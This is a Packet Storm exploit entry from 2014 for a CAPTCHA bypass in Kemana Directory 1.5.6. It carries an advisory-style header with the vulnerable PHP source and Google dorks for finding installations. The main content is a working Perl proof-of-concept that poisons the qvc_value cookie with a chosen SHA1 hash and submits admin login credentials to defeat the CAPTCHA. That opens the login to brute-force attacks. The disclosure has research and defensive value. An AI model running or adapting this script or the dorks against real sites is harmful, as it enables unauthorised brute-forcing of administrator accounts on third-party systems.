Kemana Directory 1.5.6 CAPTCHA Bypass

2014-03-25T00:00:00
ID PACKETSTORM:125872
Type packetstorm
Reporter LiquidWorm
Modified 2014-03-25T00:00:00

Description

                                        
                                            `#!C:\Perl64\bin\perl.exe  
#  
# Kemana Directory 1.5.6 (qvc_init()) Cookie Poisoning CAPTCHA Bypass Exploit  
#  
#  
# Vendor: C97net  
# Product web page: http://www.c97.net  
# Affected version: 1.5.6  
#  
# Summary: Experience the ultimate directory script solution with Kemana.  
# Create your own Yahoo or Dmoz easily with Kemana. Unique Kemana's features  
# including: CMS engine based on our qEngine, multiple directories support,  
# user friendly administration control panel, easy to use custom fields,  
# unsurpassed flexibility.  
#  
# Desc: The CAPTCHA function for Kemana Directory is prone to a security  
# bypass vulnerability that occurs in the CAPTCHA authentication routine.  
# The function 'qvc_init()' in '/includes/function.php' sets a cookie with  
# a SHA1-based hash value in the Response Header which can be replaced by  
# a random SHA1 computed hash value using Cookie Poisoning attack. Successful  
# exploit will allow attackers to bypass the CAPTCHA-based authentication  
# challenge and perform brute-force attacks.  
#  
#  
# =============================================================================  
# /includes/function.php:  
# -----------------------  
#  
# 1774: /*------- ( QVC - VISUAL CONFIRMATION FUNCTIONS aka CAPTCHA ) ------- */  
# 1775:  
# 1776:  
# 1777: // qVC - the simplest visual confirmation engine yet  
# 1778: // use qvc_init() --> <img src="visual.php"> --> compare qvc_value() == sha1 (strtolower($user_input) )?  
# 1779: // qVC uses db to communicate with visual.php, then set user cookie using sha1, then db not used!  
# 1780: // $num = either 3 or 5, 3 => only 0-9, 5 => 0-F  
# 1781: function qvc_init ($num = 5)  
# 1782: {  
# 1783: if ($num == 3)  
# 1784: $value = mt_rand (100, 999);  
# 1785: else  
# 1786: $value = random_str (5);  
# 1787: ip_config_update ('visual', $value);  
# 1788: setcookie ('qvc_value', sha1 ($value), 0, '/');  
# 1789: }  
# 1790:   
# 1791:   
# 1792: // return qvc value (it's sha1'd, so be sure to compare with sha1'd value)  
# 1793: function qvc_value ()  
# 1794: {  
# 1795: $correct_val = cookie_param ('qvc_value');  
# 1796:   
# 1797: // block browser BACK  
# 1798: qvc_init ();  
# 1799: return $correct_val;  
# 1800: }  
# =============================================================================  
#  
#  
# Tested on: Microsoft Windows 7 Professional SP1 (EN)  
# Apache/2.4.7 (Win32)  
# PHP/5.5.6  
# MySQL 5.6.14  
#  
#  
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
# @zeroscience  
#  
#  
# Advisory ID: ZSL-2014-5175  
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5175.php  
#  
#  
# Dork #1: intitle:powered by c97.net  
# Dork #2: intitle:powered by qEngine  
# Dork #3: intitle:powered by Kemana.c97.net  
# Dork #4: intitle:powered by Cart2.c97.net  
#  
#  
# 08.03.2014  
#  
  
  
use LWP::UserAgent;use HTTP::Cookies;use HTTP::Request::Common;use Digest::SHA;info();#2014-03  
$url="http://localhost/kemana/admin/login.php";$domain="localhost.local";$juzer="admin";$pass=  
"admin";$cookie_jar=HTTP::Cookies->new();$ua=LWP::UserAgent->new;$ua->cookie_jar($cookie_jar);  
print" [*] Sending request.\n";sleep(1);$request=GET $url;$response=$ua->request($request);#$_  
print" [*] Reading cookie from Response Headers.\n";$cookie_jar->extract_cookies($response);#1  
print" [*] ".$cookie_jar->as_string();sleep(1);$kuki=$cookie_jar->as_string;($regexp)=$kuki#].  
=~/qvc_value=(.*?);/;print" [*] Got CAPTCHA: ".$regexp."\n";$sha=Digest::SHA->new();$data=#(";  
"joxypoxy";$sha->add($data);$digest=$sha->hexdigest;print" [*] Poisoning with: ".$digest."\n";  
$cookie_jar->set_cookie(0,'qvc_value',$digest,'/',$domain);print" [*] ".$cookie_jar->as_string  
;sleep(1);print" [*] Sending login credentials.\n";$postche=$ua->request(POST $url,[user_id=>$  
juzer,user_passwd=>$pass,visual=>$data]);print"\n";$check=$postche->as_string;if($check=~#get;  
"HTTP/1.1 302 Found"){print" [*] CAPTCHA bypassed!\n";}else{print" [!] Didn\'t work.\n";}sub#\  
info(){print"  
+-----------------------------------------------------+  
| |  
| Kemana Directory CAPTCHA Bypass PoC Exploit |  
| |  
| ID: ZSL-2014-5175 |  
| |  
+-----------------------------------------------------+  
\n\n";}  
`